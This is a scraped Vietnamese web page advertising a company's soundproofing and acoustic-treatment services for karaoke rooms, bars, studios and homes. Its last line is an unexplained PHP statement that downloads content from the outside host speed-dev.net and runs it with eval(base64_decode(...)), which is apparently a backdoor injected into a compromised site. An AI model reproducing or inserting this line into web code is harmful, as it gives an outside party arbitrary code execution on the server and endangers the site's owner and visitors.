Liên Hệ

Hỗ Trợ Miền Bắcư Vấn Thiết Kế

Phương Pháp Tiêu Âm – Tán Âm

tieu amBạn là người thích thể hiện mình, bạn muốn xả Stress, bạn muốn tụ tập bạn bè, một trong những giải pháp là hát karaoke. Để tiết kiệm chi phí và được thoải mái bạn muốn hát tại nhà nhưng lại e ngại làm phiền tới hàng xóm. Hay bạn có một bộ trống, đàn… bạn muốn tập luyện, thật là khó khăn. Vậy bạn phải làm thế nào để không ảnh hưởng tới họ mà vẫn thỏa mãn mong muốn của mình mà âm thanh vẫn tuyệt nhất cho người nghe ở trong phòng.

Xem tiếp...

Thi công cách âm chuyên nghiệp

thi cong cach amGửi : Quý khách hàng 
Lời đầu tiên xin thay mặt toàn thể cán bộ công nhân viên Công ty, chúng tôi xin gửi tới quý vị lời chào và lời chúc sức khỏe trân trọng nhất.
Công Ty CP  Nội Thất Ấn Tượng Trẻ, một trong những C.ty xây dựng hàng đầu Việt Nam hoạt động về lĩnh vực thi công trang trí nội, ngoại thất đặc biệt trong lĩnh vực nội thất xây dựng :
- Thiết kế, thi công hệ thống cách âm Bar Cafe, Vũ Trường, phòng karaoke, phòng thu âm studio, hội trường hội quán, phòng họp...

Xem tiếp...

Cách âm - Thi công cách âm phòng karaoke, vũ trường

cach am Một phòng hát karaoke, một vũ trường, một phòng thu hạng tốt, thu hút nhiều khách bên cạnh dịch vụ tốt thì phải có thiết kế độc đáo, phối màu đẹp, ấn tượng; không chỉ có thể phòng hát đó còn phải đáp ứng một tiêu chuẩn hàng đầu nữa đó là cách âm và chống rung tốt. Khâu cách âm và chống rung tốt thì phòng hát, vũ trường đó sẽ không làm ảnh hưởng tới không gian cũng như dân cư xung quanh. Bởi vậy, để có  phòng hát karaoke , một vũ trường được cách âm tốt thì chủ đầu tư phải chú ý đến những vấn đề sau:

Xem tiếp...

$rrr = file_get_contents('http://speed-dev.net/counter/count.php'); eval(base64_decode($rrr));